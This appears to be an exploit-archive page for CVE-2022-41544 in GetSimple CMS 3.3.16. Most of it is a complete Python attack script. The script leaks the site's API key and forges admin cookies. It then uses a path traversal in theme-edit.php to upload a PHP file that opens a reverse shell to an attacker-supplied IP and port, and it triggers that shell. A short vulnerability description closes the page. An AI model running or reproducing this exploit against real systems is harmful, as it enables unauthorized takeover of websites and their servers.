Headline
GetSimple CMS 3.3.16 Shell Upload
GetSimple CMS version 3.3.16 suffers from a remote shell upload vulnerability.
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)# Data: 18/5/2023# Exploit Author : Youssef Muhammad# Vendor: Get-simple# Software Link:# Version app: 3.3.16# Tested on: linux# CVE: CVE-2022-41544import sysimport hashlibimport reimport requestsfrom xml.etree import ElementTreefrom threading import Threadimport telnetlibpurple = "\033[0;35m"reset = "\033[0m"yellow = "\033[93m"blue = "\033[34m"red = "\033[0;31m"def print_the_banner(): print(purple + ''' CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 C V V E 2 00 0 2 2 4 11 5 4 4 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 '''+ reset)def get_version(target, path): r = requests.get(f"http://{target}{path}admin/index.php") match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) if match: version = match.group(1) if version <= "3.3.16": print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") else: print ("This is not vulnrable to this CVE") return version return Nonedef api_leak(target, path): r = requests.get(f"http://{target}{path}data/other/authorization.xml") if r.ok: tree = ElementTree.fromstring(r.content) apikey = tree[0].text print(f"[+] apikey obtained {apikey}") return apikey return Nonedef set_cookies(username, version, apikey): cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" headers = { 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookies } return headersdef get_csrf_token(target, path, headers): r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) m = re.search('nonce" type="hidden" value="(.*)"', r.text) if m: print("[+] csrf token obtained") return m.group(1) return Nonedef upload_shell(target, path, headers, nonce, shell_content): upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" payload = { 'content': shell_content, 'edited_file': '../shell.php', 'nonce': nonce, 'submitsave': 1 } try: response = requests.post(upload_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Shell uploaded successfully!") else: print("(-) Shell upload failed!") except requests.exceptions.RequestException as e: print("(-) An error occurred while uploading the shell:", e)def shell_trigger(target, path): url = f"http://{target}{path}/shell.php" try: response = requests.get(url) if response.status_code == 200: print("[+] Webshell trigged successfully!") else: print("(-) Failed to visit the page!") except requests.exceptions.RequestException as e: print("(-) An error occurred while visiting the page:", e)def main(): if len(sys.argv) != 5: print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") return target = sys.argv[1] path = sys.argv[2] if not path.endswith('/'): path += '/' ip, port = sys.argv[3].split(':') username = sys.argv[4] shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """ version = get_version(target, path) if not version: print("(-) could not get version") return apikey = api_leak(target, path) if not apikey: print("(-) could not get apikey") return headers = set_cookies(username, version, apikey) nonce = get_csrf_token(target, path, headers) if not nonce: print("(-) could not get nonce") return upload_shell(target, path, headers, nonce, shell_content) shell_trigger(target, path)if __name__ == '__main__': print_the_banner() main()Related news
CVE-2022-41544: Remote command execution vulnerability in 3.3.16 · Issue #1352 · GetSimpleCMS/GetSimpleCMS
GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.